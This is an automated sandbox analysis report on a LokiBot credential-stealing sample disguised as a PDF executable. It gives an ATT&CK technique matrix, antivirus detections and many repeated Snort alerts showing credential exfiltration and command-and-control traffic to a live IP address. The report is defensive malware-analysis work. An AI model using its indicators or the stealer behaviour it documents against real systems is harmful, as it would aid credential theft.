Analysis Report EDG95320200205005000471_126_953.pdf.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 229741
Start date: 13.05.2020
Start time: 08:48:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 9s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: EDG95320200205005000471_126_953.pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@3/4@117/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 13.5% (good quality ratio 12.9%)
  • Quality average: 76.3%
  • Quality standard deviation: 28.7%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • HTTP Packets have been reduced
  • TCP Packets have been reduced to 100
  • Excluded IPs from analysis (whitelisted): 2.18.68.82
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy  | Score | Range   | Reporting | Whitelisted | Threat  | Detection
Threshold | 100   | 0 - 100 |           | false       | Lokibot | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Techniques are listed per tactic column of the matrix; a number in parentheses is the count shown next to that technique in the report.

Initial Access:
  • Valid Accounts (1)
  • Replication Through Removable Media
  • External Remote Services
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment
  • Spearphishing via Service
  • Supply Chain Compromise
Execution:
  • Windows Remote Management
  • Service Execution
  • Windows Management Instrumentation
  • Scheduled Task
  • Command-Line Interface
  • Graphical User Interface
  • Scripting
  • Third-party Software
  • Rundll32
Persistence:
  • Valid Accounts (1)
  • Port Monitors
  • Accessibility Features
  • System Firmware
  • Shortcut Modification
  • Modify Existing Service
  • Path Interception
  • Logon Scripts
  • DLL Search Order Hijacking
Privilege Escalation:
  • Valid Accounts (1)
  • Access Token Manipulation (11)
  • Process Injection (12)
  • DLL Search Order Hijacking
  • File System Permissions Weakness
  • New Service
  • Scheduled Task
  • Process Injection
  • Service Registry Permissions Weakness
Defense Evasion:
  • Disabling Security Tools (1)
  • Deobfuscate/Decode Files or Information (1)
  • Obfuscated Files or Information (13)
  • Masquerading (11)
  • Valid Accounts (1)
  • Virtualization/Sandbox Evasion (2)
  • Access Token Manipulation (11)
  • Process Injection (12)
  • Process Injection
Credential Access:
  • Credential Dumping (2)
  • Credentials in Registry (2)
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force
  • Two-Factor Authentication Interception
  • Bash History
  • Input Prompt
Discovery:
  • Account Discovery (1)
  • Security Software Discovery (1)
  • File and Directory Discovery (2)
  • System Information Discovery (13)
  • Virtualization/Sandbox Evasion (2)
  • Process Discovery (2)
  • Application Window Discovery (1)
  • System Owner/User Discovery (1)
  • Remote System Discovery (1)
Lateral Movement:
  • Remote File Copy (3)
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software
  • Pass the Hash
  • Remote Desktop Protocol
  • Windows Admin Shares
Collection:
  • Man in the Browser (1)
  • Data from Local System (2)
  • Email Collection (1)
  • Input Capture
  • Data Staged
  • Screen Capture
  • Email Collection
  • Clipboard Data
  • Automated Collection
Exfiltration:
  • Data Encrypted (1)
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits
  • Exfiltration Over Command and Control Channel
  • Exfiltration Over Alternative Protocol
  • Exfiltration Over Physical Medium
Command and Control:
  • Remote File Copy (3)
  • Standard Cryptographic Protocol (1)
  • Standard Non-Application Layer Protocol (3)
  • Standard Application Layer Protocol (13)
  • Standard Cryptographic Protocol
  • Commonly Used Port
  • Uncommonly Used Port
  • Standard Application Layer Protocol
  • Multilayer Encryption
Network Effects:
  • Eavesdrop on Insecure Network Communication
  • Exploit SS7 to Redirect Phone Calls/SMS
  • Exploit SS7 to Track Device Location
  • SIM Card Swap
  • Manipulate Device Communication
  • Jamming or Denial of Service
  • Rogue Wi-Fi Access Points
  • Downgrade to Insecure Protocols
  • Rogue Cellular Base Station
Remote Service Effects:
  • Remotely Track Device Without Authorization
  • Remotely Wipe Data Without Authorization
  • Obtain Device Cloud Backups
Impact:
  • Modify System Partition
  • Device Lockout
  • Delete Device Data
  • Premium SMS Toll Fraud
  • Manipulate App Store Rankings or Ratings
  • Abuse Accessibility Features
  • Data Encrypted for Impact
  • Generate Fraudulent Advertising Revenue
  • Data Destruction

Signature Overview

AV Detection:

Antivirus detection for sample
Source: EDG95320200205005000471_126_953.pdf.exe | Avira: detection malicious, Label: HEUR/AGEN.1046458
Machine Learning detection for sample
Source: EDG95320200205005000471_126_953.pdf.exe | Joe Sandbox ML: detected

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe | Code function: 4x nop then xor byte ptr [esi], bl
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe | Code function: 4x nop then cmp byte ptr [esi], 00000000h

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 72.55.186.14:80
